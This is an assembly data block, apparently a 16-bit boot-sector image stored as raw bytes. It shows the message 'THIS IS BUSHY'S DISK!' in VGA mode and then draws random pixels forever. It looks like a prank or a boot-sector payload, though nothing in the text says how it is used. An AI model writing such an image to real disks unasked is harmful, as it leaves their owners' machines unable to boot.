sig db 0EBh,02Dh,090h,040h,000h,040h,000h,06Fh,00Ch,022h,000h,054h,048h,049h,053h,020h
db 049h,053h,020h,042h,055h,053h,048h,059h,027h,053h,020h,044h,049h,053h,04Bh,021h
db 020h,020h,020h,020h,020h,020h,020h,020h,020h,020h,020h,020h,020h,024h,000h,0B8h
db 013h,000h,0CDh,010h,031h,0C0h,08Eh,0C0h,0B8h,000h,013h,0BDh,049h,07Ch,0B9h,022h
db 000h,0BAh,003h,00Ch,0BBh,08Fh,000h,0CDh,010h,0B8h,000h,0A0h,08Eh,0C0h,0B8h,040h
db 001h,08Bh,01Eh,005h,001h,0F7h,0E3h,003h,006h,003h,001h,08Bh,0F8h,0B9h,01Eh,000h
db 026h,08Ah,005h,0FEh,0C0h,026h,088h,005h,047h,0E2h,0F5h,08Bh,01Eh,007h,001h,0B8h
db 06Dh,04Eh,0F7h,0E3h,0D1h,0E0h,015h,061h,000h,0D1h,0E8h,0F7h,0D8h,0D1h,0E0h,025h
db 0FEh,07Fh,0D1h,0E8h,0A3h,007h,001h,03Ch,080h,072h,007h,0FFh,006h,003h,001h,0EBh
db 005h,090h,0FFh,00Eh,003h,001h,0FFh,006h,005h,001h,0EBh,0B2h
 